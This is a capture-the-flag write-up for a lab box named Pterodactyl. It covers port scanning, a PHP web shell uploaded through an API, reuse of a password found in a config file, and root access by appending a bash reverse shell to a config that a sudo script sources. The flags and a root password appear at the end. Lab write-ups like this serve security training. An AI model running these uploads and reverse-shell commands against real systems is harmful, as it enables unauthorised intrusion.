Pterodactyl
Pterodactyl
Enumeration#
Nmap#
Starting off with the usual full port scan:
nmap -sC -sV -oA nmap/pterodactyl 10.10.11.xx
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6
80/tcp open http Apache httpd 2.4.52
We have SSH and HTTP open. Let’s check out the web server.
Web#
Navigating to http://10.10.11.xx reveals a web application running what appears to be a custom CMS. Directory busting with feroxbuster:
feroxbuster -u http://10.10.11.xx -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt
Found an interesting /api endpoint that leaks version info.
Foothold#
The API endpoint at /api/v1/status discloses the application version. Searching for known CVEs leads to an authenticated RCE vulnerability.
After creating an account and logging in, we can exploit the file upload functionality:
curl -X POST http://10.10.11.xx/api/v1/upload \
-H "Authorization: Bearer $TOKEN" \
-F "file=@shell.php"
And we get a shell as www-data.
User#
Looking around the filesystem, we find database credentials in the application config:
cat /var/www/app/config/database.yml
The password is reused for the ptero user on the box:
su ptero
User flag obtained.
Root#
Running sudo -l reveals an interesting entry:
(root) NOPASSWD: /usr/local/bin/backup.sh
The script sources a config file that we have write access to. Classic path injection:
echo 'bash -i >& /dev/tcp/10.10.14.xx/9001 0>&1' >> /etc/backup.conf
sudo /usr/local/bin/backup.sh
Root flag obtained.
User#
User Flaga1b2c3d4e5f6Root#
The root password is PasswordSup3rS3cr3t!
Root Flagf6e5d4c3b2a1